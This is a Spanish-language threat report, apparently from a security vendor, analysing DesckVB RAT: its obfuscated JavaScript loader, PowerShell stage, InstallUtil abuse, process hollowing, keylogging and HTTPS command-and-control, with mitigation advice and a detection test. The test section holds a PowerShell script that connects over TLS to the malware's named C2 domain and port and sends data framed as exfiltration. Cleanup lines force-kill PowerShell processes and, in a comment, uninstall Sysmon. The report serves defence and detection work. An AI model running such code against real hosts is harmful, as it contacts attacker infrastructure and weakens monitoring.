Análisis de DesckVB RAT: Desde el Cargador de JavaScript hasta el RAT Fileless .NET

Ruslan Mikhalov Jefe de Investigación de Amenazas en SOC Prime

Seguir

Análisis de DesckVB RAT: Desde el Cargador de JavaScript hasta el RAT Fileless .NET

Detection stack

AIDR
Alert
ETL
Query

Informe de Amenazas
Flujo de Ataque
Detecciones
Simulaciones

Resumen

DesckVB RAT es un troyano impulsado por JavaScript que conecta con un cargador de PowerShell para obtener y ejecutar un DLL .NET sin archivos directamente en la memoria. Para ocultar la ejecución, el cargador recurre a la codificación Base64 y ofuscación de cadena inversa, abusa de InstallUtil.exe como LOLBin y lanza un nuevo proceso usando CreateProcessA. Una vez activo, el RAT establece comunicaciones C2 cifradas por HTTPS y soporta módulos para registro de teclas, acceso a la cámara web y descubrimiento anti-AV.

Investigación

El análisis indica que la etapa inicial de JavaScript escribe un script de PowerShell en C:UsersPublic, luego se comunica con un dominio ofuscado para descargar un ensamblado .NET (por ejemplo, ClassLibrary3.dll). El ensamblado carga las DLL de soporte, crea un proceso suspendido e inyecta código de carga mientras reporta detalles de configuración como un dominio y puerto malicioso secundario. La telemetría de red confirma las comunicaciones cifradas por TLS del anfitrión infectado a la infraestructura C2 del atacante.

Mitigación

Bloquee la ejecución de scripts de PowerShell no confiables o no firmados y restrinja el uso de InstallUtil.exe para flujos de trabajo no administrativos o inesperados. Aplique controles estrictos de salida, incluida la inspección HTTPS donde sea factible y filtrado de reputación de dominio para la infraestructura maliciosa identificada. En los puntos finales, detecte el uso de CreateProcessA con señales de procesos suspendidos y alerte sobre patrones de carga de ensamblados .NET en memoria consistentes con la inyección sin archivos.

Respuesta

Si se detectan indicadores, aísle el punto final, detenga la cadena de procesos maliciosa y capture volcados de memoria para el análisis de ensamblados en memoria y regiones inyectadas. Elimine los artefactos de PowerShell en C:UsersPublic y erradique cualquier DLL relacionada o restos del cargador. Restablezca las credenciales impactadas, rode siempre las claves expuestas, y revise los registros de firewall/proxy para conexiones salientes a los dominios y puertos listados.

"graph TB %% Definiciones de clases classDef action fill:#ffcc99 classDef tool fill:#99ccff classDef malware fill:#ccffcc classDef file fill:#dddddd %% Nodos loader_js["Herramienta – Nombre: Cargador JavaScript Ofuscado Técnica: T1027.006 HTML Smuggling Técnica: T1027.008 Payloads Recortados Descripción: Usa Base64 y cadenas invertidas para ocultar comandos"] class loader_js tool powershell_script["Herramienta – Nombre: Script de PowerShell lkpzw_01.ps1 Técnica: T1059.001 PowerShell Descripción: Se ejecuta con política de ejecución eludida"] class powershell_script tool dotnet_assembly["Archivo: Ensamblado .NET Malicioso"] class dotnet_assembly file installutil_execution["Herramienta – Nombre: InstallUtil.exe Técnica: T1218.004 Ejecución de Proxys de Binarios del Sistema Descripción: Ejecuta DLL .NET a través de un binario del sistema de confianza"] class installutil_execution tool dotnet_reflection["Malware – Nombre: ClassLibrary3.dll Técnica: T1620 Carga de Código Reflexiva Descripción: Carga ensamblado directamente en la memoria usando reflexión"] class dotnet_reflection malware process_hollow["Acción – Técnica: T1055.012 Hollowing de Procesos Descripción: Crea un proceso suspendido e inyecta código malicioso"] class process_hollow action thread_hijack["Acción – Técnica: T1055.003 Secuestro de Ejecución de Hilos Descripción: Secuestra la ejecución del hilo dentro del proceso objetivo"] class thread_hijack action dll_hijack["Acción – Técnica: T1574.001 Flujo de Ejecución de Secuestro DLL Descripción: Carga DLL adicionales en memoria para extender la funcionalidad"] class dll_hijack action keylogger_module["Malware – Nombre: Microsoft.exe Técnica: T1056.001 Keylogging Descripción: Deja keylogger y otros módulos"] class keylogger_module malware c2_https["Acción – Técnica: T1071.001 Protocolos Web Descripción: Se comunica por HTTPS mezclándose con tráfico legítimo"] class c2_https action %% Conexiones loader_js –>|escribe y ejecuta| powershell_script powershell_script –>|descarga ensamblado| dotnet_assembly dotnet_assembly –>|ejecutado via| installutil_execution installutil_execution –>|carga mediante reflexión| dotnet_reflection dotnet_reflection –>|crea proceso suspendido| process_hollow process_hollow –>|usa secuestro de hilo| thread_hijack thread_hijack –>|carga DLL adicionales| dll_hijack dll_hijack –>|habilita| keylogger_module keylogger_module –>|se comunica con C2| c2_https "

Flujo de Ataque

Narrativa de Ataque y Comandos:
El atacante, habiendo obtenido un punto de apoyo inicial, lanza una carga útil basada en PowerShell ‘living-off-the-land’ que abre una conexión TCP envuelta en TLS al dominio C2 codificado manikandan83.mysynology.net en el puerto 7535. La carga útil codifica un bloque de datos ficticio con Base64 (ilustrando T1132.002) y lo transmite a través del canal TLS. Debido a que las clases .NET de PowerShell son utilizadas, no se escriben binarios externos en el disco, imitando la naturaleza sin archivos de DesckVB RAT. La conexión es establecida por un proceso hijo (powershell.exe) que será capturado por Sysmon como un evento de conexión de red con el dominio exacto, puerto y señal de apretón de manos TLS que la regla monitorea.

Script de Prueba de Regresión:

# --------------------------------------------------------------
# Simulación de Comunicación C2 de DesckVB RAT (PowerShell)
# --------------------------------------------------------------
# Parámetros
$c2Domain = "manikandan83.mysynology.net"
$c2Port   = 7535

# Carga útil ficticia (codificada en Base64) – representa datos exfiltrados
$payload  = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("sensor_data=42"))

try {
    # Establecer conexión TCP
    $tcpClient = New-Object System.Net.Sockets.TcpClient($c2Domain, $c2Port)
    $netStream = $tcpClient.GetStream()

    # Envolver con TLS (SslStream)
    $sslStream = New-Object System.Net.Security.SslStream($netStream,$false,({$true}))
    $sslStream.AuthenticateAsClient($c2Domain)

    Write-Host "[+] Se completó el apretón de manos TLS con $c2Domain:$c2Port"

    # Enviar prefijo de longitud de carga útil (4 bytes, big-endian) luego los datos
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($payload)
    $len   = [BitConverter]::GetBytes([System.Net.IPAddress]::HostToNetworkOrder($bytes.Length))
    $sslStream.Write($len,0,$len.Length)
    $sslStream.Write($bytes,0,$bytes.Length)
    $sslStream.Flush()
    Write-Host "[+] Carga útil enviada (longitud Base64 $($bytes.Length))"

} catch {
    Write-Error "[-] Falló la conexión: $_"
} finally {
    # Cierre limpio
    if ($sslStream) { $sslStream.Close() }
    if ($netStream) { $netStream.Close() }
    if ($tcpClient) { $tcpClient.Close() }
    Write-Host "[*] Conexión terminada."
}

Comandos de Limpieza:

# Asegúrese de que cualquier conexión NetTCP de PowerShell persistente esté cerrada
Get-Process -Name powershell | Where-Object {
    $_.Modules.ModuleName -match 'System.Net.Sockets.TcpClient'
} | Stop-Process -Force

# Opcional: Eliminar Sysmon (si este es un entorno de prueba única)
# &$ '"$env:ProgramFilesSysmonSysmon.exe' -u

Únete a la plataforma Detection as Code de SOC Prime para mejorar la visibilidad de las amenazas más relevantes para tu negocio. Para ayudarte a comenzar y obtener valor inmediato, programa una reunión ahora con los expertos de SOC Prime.

Únete gratis